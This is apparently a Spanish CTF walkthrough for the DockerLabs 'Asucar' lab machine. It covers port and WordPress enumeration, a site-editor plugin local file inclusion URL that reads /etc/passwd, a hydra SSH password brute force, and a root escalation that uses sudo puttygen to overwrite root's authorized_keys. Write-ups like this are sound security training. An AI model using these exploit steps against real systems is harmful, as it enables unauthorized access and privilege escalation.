> For the complete documentation index, see [llms.txt](https://dise0.gitbook.io/h4cker_b00k/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dise0.gitbook.io/h4cker_b00k/ctf/dockerlabs/asucar-dockerlabs-intermediate.md). # Asucar DockerLabs (Intermediate) ### Instalación Cuando obtenemos el `.zip` nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente. ```shell unzip asucar.zip ``` Nos lo descomprimira y despues montamos la maquina de la siguiente forma. ```shell bash auto_deploy.sh asucar.tar ``` Info: ``` Estamos habilitando el servicio de docker. Espere un momento... Synchronizing state of docker.service with SysV service script with /usr/lib/systemd/systemd-sysv-install. Executing: /usr/lib/systemd/systemd-sysv-install enable docker Docker ha sido instalado correctamente. Estamos desplegando la máquina vulnerable, espere un momento. Máquina desplegada, su dirección IP es --> 172.17.0.2 Presiona Ctrl+C cuando termines con la máquina para eliminarla ``` Por lo que cuando terminemos de hackearla, le damos a `Ctrl+C` y nos eliminara la maquina para que no se queden archivos basura. ### Escaneo de puertos ```shell nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn ``` ```shell nmap -sCV -p ``` Info: ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-07 08:32 EDT Nmap scan report for 172.17.0.2 Host is up (0.000027s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 64:44:10:ff:fe:17:28:06:93:11:e4:55:ea:93:3b:65 (ECDSA) |_ 256 2d:aa:fb:08:58:aa:34:8d:4f:8a:71:b9:e4:b5:99:43 (ED25519) 80/tcp open http Apache httpd 2.4.59 ((Debian)) |_http-generator: WordPress 6.5.3 |_http-title: Asucar Moreno |_http-server-header: Apache/2.4.59 (Debian) MAC Address: 02:42:AC:11:00:02 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds ``` ### Gobuster ```shell gobuster dir -u http:/// -w -x html,php,txt -t 50 -k -r ``` Info: ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://172.17.0.2/ [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,php,txt [+] Follow Redirect: true [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess.html (Status: 403) [Size: 275] /.htaccess.txt (Status: 403) [Size: 275] /.htaccess (Status: 403) [Size: 275] /.htpasswd.txt (Status: 403) [Size: 275] /.htpasswd.html (Status: 403) [Size: 275] /.htpasswd (Status: 403) [Size: 275] /.htpasswd.php (Status: 403) [Size: 275] /.htaccess.php (Status: 403) [Size: 275] /index.php (Status: 200) [Size: 96154] /license.txt (Status: 200) [Size: 19915] /readme.html (Status: 200) [Size: 7401] /server-status (Status: 403) [Size: 275] /wordpress (Status: 200) [Size: 745] /wp-content (Status: 200) [Size: 0] /wp-config.php (Status: 200) [Size: 0] /wp-includes (Status: 200) [Size: 58715] /wp-trackback.php (Status: 200) [Size: 136] /xmlrpc.php (Status: 405) [Size: 42] /wp-login.php (Status: 200) [Size: 7464] Progress: 81876 / 81880 (100.00%) /wp-admin (Status: 200) [Size: 7555] =============================================================== Finished =============================================================== ``` Por lo que vemos tiene un `wordpress` por lo que haremos lo siguiente, si miramos en el codigo fuente del `wordpress` vemos que nos viene un dominio llamado `asucar.dl` por lo que editaremos lo siguiente. ```shell nano /etc/hosts #Dentro del nano asucar.dl ``` Lo guardamos y ahora ponemos lo siguiente para irnos al login de `wordpress`. ``` URL = http://asucar.dl/wp-login.php ``` Y esto nos llevara al login, por lo que hemos visto antes hay un nombre de usuario llamado `wordpress` y si lo probamos nos dira que existe pero que la contraseña no es correcta, por lo que haremos lo siguiente. ```shell wpscan --url http://asucar.dl/ --enumerate u ``` Info: ``` __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://asucar.dl/ [172.17.0.2] [+] Started: Wed Aug 7 08:42:47 2024 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.59 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://asucar.dl/xmlrpc.php | Found By: Link Tag (Passive Detection) | Confidence: 100% | Confirmed By: Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://asucar.dl/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://asucar.dl/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://asucar.dl/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.5.3 identified (Insecure, released on 2024-05-07). | Found By: Rss Generator (Passive Detection) | - http://asucar.dl/index.php/feed/, https://wordpress.org/?v=6.5.3 | - http://asucar.dl/index.php/comments/feed/, https://wordpress.org/?v=6.5.3 [+] WordPress theme in use: twentytwentyfour | Location: http://asucar.dl/wp-content/themes/twentytwentyfour/ | Last Updated: 2024-07-16T00:00:00.000Z | Readme: http://asucar.dl/wp-content/themes/twentytwentyfour/readme.txt | [!] The version is out of date, the latest version is 1.2 | [!] Directory listing is enabled | Style URL: http://asucar.dl/wp-content/themes/twentytwentyfour/style.css | Style Name: Twenty Twenty-Four | Style URI: https://wordpress.org/themes/twentytwentyfour/ | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti... | Author: the WordPress team | Author URI: https://wordpress.org | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Urls In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://asucar.dl/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] wordpress | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://asucar.dl/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Wed Aug 7 08:42:50 2024 [+] Requests Done: 68 [+] Cached Requests: 7 [+] Data Sent: 15.519 KB [+] Data Received: 21.836 MB [+] Memory used: 196.898 MB [+] Elapsed time: 00:00:02 ``` Nos dira lo que ya sabemos que hay un usuario llamado `wordpress`. ```shell wpscan --url http://asucar.dl/ --usernames wordpress --passwords ``` Info: ``` _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://asucar.dl/ [172.17.0.2] [+] Started: Wed Aug 7 08:46:02 2024 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.59 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://asucar.dl/xmlrpc.php | Found By: Link Tag (Passive Detection) | Confidence: 100% | Confirmed By: Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://asucar.dl/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://asucar.dl/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://asucar.dl/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.5.3 identified (Insecure, released on 2024-05-07). | Found By: Rss Generator (Passive Detection) | - http://asucar.dl/index.php/feed/, https://wordpress.org/?v=6.5.3 | - http://asucar.dl/index.php/comments/feed/, https://wordpress.org/?v=6.5.3 [+] WordPress theme in use: twentytwentyfour | Location: http://asucar.dl/wp-content/themes/twentytwentyfour/ | Last Updated: 2024-07-16T00:00:00.000Z | Readme: http://asucar.dl/wp-content/themes/twentytwentyfour/readme.txt | [!] The version is out of date, the latest version is 1.2 | [!] Directory listing is enabled | Style URL: http://asucar.dl/wp-content/themes/twentytwentyfour/style.css | Style Name: Twenty Twenty-Four | Style URI: https://wordpress.org/themes/twentytwentyfour/ | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti... | Author: the WordPress team | Author URI: https://wordpress.org | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Urls In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://asucar.dl/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] site-editor | Location: http://asucar.dl/wp-content/plugins/site-editor/ | Last Updated: 2017-05-02T23:34:00.000Z | [!] The version is out of date, the latest version is 1.1.1 | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.1 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://asucar.dl/wp-content/plugins/site-editor/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://asucar.dl/wp-content/plugins/site-editor/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=========================================================================================================> (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc against 1 user/s ^Cying wordpress / pinguino Time: 00:01:22 < > (11014 / 14344392) 0.07% ETA: 29:49:37 [i] No Valid Passwords Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. > (11015 / 14344392) 0.07% ETA: 29:50:09 [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Wed Aug 7 08:47:30 2024 [+] Requests Done: 11164 [+] Cached Requests: 35 [+] Data Sent: 5.627 MB [+] Data Received: 6.655 MB [+] Memory used: 321.762 MB [+] Elapsed time: 00:01:27 ``` Si hacemos esto no nos descubrira nada, pero si vemos que hay un plugin llamado `site-editor` y si buscamos un exploit del mismo veremos que hay un `Local File Inclusion` por lo que haremos lo siguiente. URL = Si nos vamos a la siguiente direccion URL, podremos ver el `passwd` de la maquina victima aprovechando esta vulnerabilidad del plugin. ``` URL = http://asucar.dl/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd ``` Info: ``` root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin mysql:x:100:101:MySQL Server,,,:/nonexistent:/bin/false systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin messagebus:x:101:102::/nonexistent:/usr/sbin/nologin sshd:x:102:65534::/run/sshd:/usr/sbin/nologin curiosito:x:1000:1000::/home/curiosito:/bin/bash {"success":true,"data":{"output":[]}} ``` Vemos que hay un usuario que se llama `curiosito` por lo que probaremos a hacer fuerza bruta con `hydra`. ### hydra ```shell hydra -l curiosito -P /usr/share/wordlists/rockyou.txt ssh:// -t 64 ``` Info: ``` Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-07 09:08:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task [DATA] attacking ssh://172.17.0.2:22/ [22][ssh] host: 172.17.0.2 login: curiosito password: password1 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 22 final worker threads did not complete until end. [ERROR] 22 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-07 09:08:33 ``` Y por lo que vemos encontramos las credenciales del usuario. ``` User = curiosito Pass = password1 ``` ### SSH ```shell ssh curiosito@ ``` Metemos la contarseña y ya estariamos dentro de la maquina. ### Privilege Escalation Si hacemos `sudo -l` podemos ver lo siguiente. ``` Matching Defaults entries for curiosito on b1ef8aba7ba2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User curiosito may run the following commands on b1ef8aba7ba2: (root) NOPASSWD: /usr/bin/puttygen ``` Podremos ejecutar `puttygen` como `root` por lo que haremos lo siguiente. Generaremos una clave `id_rsa` en la carpeta de `root` siendo la clave del ssh de `root`. ```shell puttygen -t rsa -o id_rsa -O private-openssh ``` Y ahora copiaremos esa clave `id_rsa` al directorio actual en el que estamos utilizando el `sudo` ya que podemos hacerlo. ```shell sudo -u root puttygen id_rsa -o /root/.ssh/authorized_keys -O public-openssh ``` Y tendremos la `id_rsa` ya en nuestro directorio, por lo que haremos lo siguiente. ```shell chmod 600 id_rsa ssh -i id_rsa root@localhost ``` Haciendo esto nos habremos conectado por `ssh` con el usuario `root` con la `id_rsa` que generamos y copiamos a nuestra carpeta, por lo que ya seremos `root`. ``` The authenticity of host 'localhost (127.0.0.1)' can't be established. ED25519 key fingerprint is SHA256:uxPuaJueTWTbzOOOgHR9jKEuKfQzpWt1rU8JihuRr4o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'localhost' (ED25519) to the list of known hosts. Linux b1ef8aba7ba2 6.6.9-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.9-1kali1 (2024-01-08) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@b1ef8aba7ba2:~# whoami root ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dise0.gitbook.io/h4cker_b00k/ctf/dockerlabs/asucar-dockerlabs-intermediate.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.